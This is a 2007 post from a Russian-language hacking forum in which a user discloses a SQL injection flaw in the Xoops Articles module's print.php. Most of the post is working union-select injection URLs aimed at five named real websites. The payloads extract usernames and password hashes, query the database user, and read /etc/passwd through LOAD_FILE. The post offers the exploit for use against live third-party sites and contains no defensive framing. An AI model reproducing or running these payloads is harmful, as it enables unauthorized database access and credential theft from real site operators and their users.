Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

02.03.2007, 21:02
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме: 4908597
Репутация:
1866
|
|
[xoops]
Сейчас вот нарыл в Xoops'e одну вещь... Нигде в багтраках не видел этой уязвимости...
Программа: Xoops(пока что х3 до какой версии + должен присутствовать модуль - Articles)
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://victim/modules/articles/print.php?id=-1{code}
URL производителя: www.xoops.org
Вот реальные примеры:
Код:
http://www.irc.by/modules/articles/print.php?id=-99+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(uname,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*
Код:
http://www.xoops2.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,convert(user()+using+cp1251),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops2_users/*
Код:
http://www.xoops.pl/modules/articles/print.php?id=-99+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+manga_users/*
Код:
http://www.dolbin.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,concat(uname,0x3a,pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*
Код:
http://www.titanic.com/modules/articles/print.php?id=-99+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
(c)ice1k :: AltST
Последний раз редактировалось ice1k; 03.03.2007 в 14:06..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|